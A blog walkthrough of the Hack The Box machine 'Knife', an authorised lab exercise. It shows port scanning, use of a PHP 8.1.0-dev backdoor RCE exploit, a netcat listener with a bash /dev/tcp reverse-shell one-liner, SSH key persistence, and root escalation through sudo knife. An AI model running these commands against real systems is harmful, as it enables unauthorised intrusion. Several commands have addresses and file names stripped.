Knife Walkthrough – Hackthebox – Writeup

Knife is an active machine from hackthebox. So, only come here if you are too desperate. “Knife Walkthrough – Hackthebox – Writeup”

Note: To write public writeups for active machines is against the rules of HTB. Otherwise, I could protect this blog post using the root flag. Also, I couldn’t find the best content locker that allows custom message for WordPress. So, I couldn’t password protect this blog post using other methods like root hash, root-only readable file contents, etc.

Walkthrough of Cap

To make the internet work, remove a default route that is added by the VPN.

sudo route del -net default gw netmask dev tun0

Scan open ports

Firstly, I scanned the exposed services by identifying the open ports on the target machine.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log

For some reasons my script execution failed. However, I went to see the webserver.

Enumerate web server

When I opened the developer tools of the browser, I found out that the web server using php 8.1.0-dev.

There had been a very recent RCE exploit for this version of the PHP.

I downloaded the code from the link above and saved it as

wget -O

Next, I ran some commands to verify the exploit.

python3 -u -c "id"

Now, my next step would be spawning a reverse shell. Hence, I started listening on the port 4444.

nc -nlvp 4444 
python3 -u -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'"

Finally, I got the reverse shell.

Likewise, I got the user flag. I copied my public key to the machine to get the SSH access. Somehow, the private key of the target didn’t work for me.

echo __public_key__ > ~/.ssh/authorized_keys
# on local machine
ssh james@ -i ~/.ssh/id_rsa

And, I finally got the SSH shell.

Root privilege escalation

Next, I looked at the sudo permissions of the user.

sudo -l

The user could execute the binary knife as the root and without requiring his own password. So, I decided to run what the binary did.

sudo knife

The binary can read a configuration file. When I looked at the intensive guides on internet, I found out that it could take ruby source scripts.

Hence, I decided to get the shell of the root. So, I created a file called “config.rb” and add the following code.

vi config.rb

Then, I executed the knife command with the config file.

sudo knife user list -c config.rb
cat root.txt


This is a machine that doesn’t work on any credentials or brute forcing. This is a machine that needs close inspection on every thing.

0 0 votes
Article Rating
Notify of
Newest Most Voted
Inline Feedbacks
View all comments